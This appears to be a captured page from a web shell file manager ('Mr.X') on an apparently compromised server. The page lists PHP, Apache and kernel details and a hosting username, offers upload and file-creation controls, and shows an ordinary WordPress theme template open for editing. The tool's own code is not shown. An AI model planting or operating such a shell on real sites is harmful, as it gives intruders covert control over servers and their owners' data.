🤩 File Manager - Mr.X
PHP:
8.3.33
Server:
Apache
OS:
Linux 5.14.0-611.49.1.el9_7.x86_64
User:
websparkit
Navigate
Upload:
Upload
New File
New Folder
Editing:single.php
<?php get_header(); ?> <section class="page-banner-section"> <div class="container"> <div class="row"> <div class="col-12 text-center"> <h1 class="page-banner-title"><?php the_title(); ?></h1> <?php unfia_breadcrumbs(); ?> </div> </div> </div> </section> <section class="single-post-section section-padding"> <div class="container"> <div class="row g-4"> <div class="col-lg-8"> <?php while (have_posts()): the_post(); ?> <article id="post-<?php the_ID(); ?>" <?php post_class('single-post'); ?>> <div class="post-meta-top"> <span class="post-date"><i class="far fa-calendar"></i> <?php echo get_the_date(); ?></span> <span class="post-author"><i class="far fa-user"></i> <?php the_author(); ?></span> <span class="post-category"><i class="far fa-folder"></i> <?php the_category(', '); ?></span> <span class="post-comments"><i class="far fa-comments"></i> <?php comments_number(); ?></span> </div> <?php if (has_post_thumbnail()): ?> <div class="post-thumbnail mb-4"> <?php the_post_thumbnail('unfia-hero', ['class' => 'img-fluid rounded-4']); ?> </div> <?php endif; ?> <div class="post-content"> <?php the_content(); ?> </div> <div class="post-tags"> <?php if (has_tag()): the_tags('<i class="fas fa-tags"></i> ', ', ', ''); endif; ?> </div> <div class="post-share"> <span><?php _e('Share:', 'unfia'); ?></span> <a href="https://www.facebook.com/sharer/sharer.php?u=<?php the_permalink(); ?>" target="_blank"><i class="fab fa-facebook-f"></i></a> <a href="https://twitter.com/intent/tweet?url=<?php the_permalink(); ?>&text=<?php the_title(); ?>" target="_blank"><i class="fab fa-twitter"></i></a> <a href="https://www.linkedin.com/shareArticle?mini=true&url=<?php the_permalink(); ?>" target="_blank"><i class="fab fa-linkedin-in"></i></a> </div> <nav class="post-navigation"> <div class="row"> <div class="col-6"> <?php previous_post_link('%link', '<i class="fas fa-chevron-left"></i> %title'); ?> </div> <div class="col-6 text-end"> <?php next_post_link('%link', '%title <i class="fas fa-chevron-right"></i>'); ?> </div> </div> </nav> <?php if (comments_open() || get_comments_number()): comments_template(); endif; ?> </article> <?php endwhile; ?> </div> <div class="col-lg-4"> <?php get_sidebar(); ?> </div> </div> </div> </section> <?php get_footer(); ?>
Save Changes
Cancel
Create New File
Create New Folder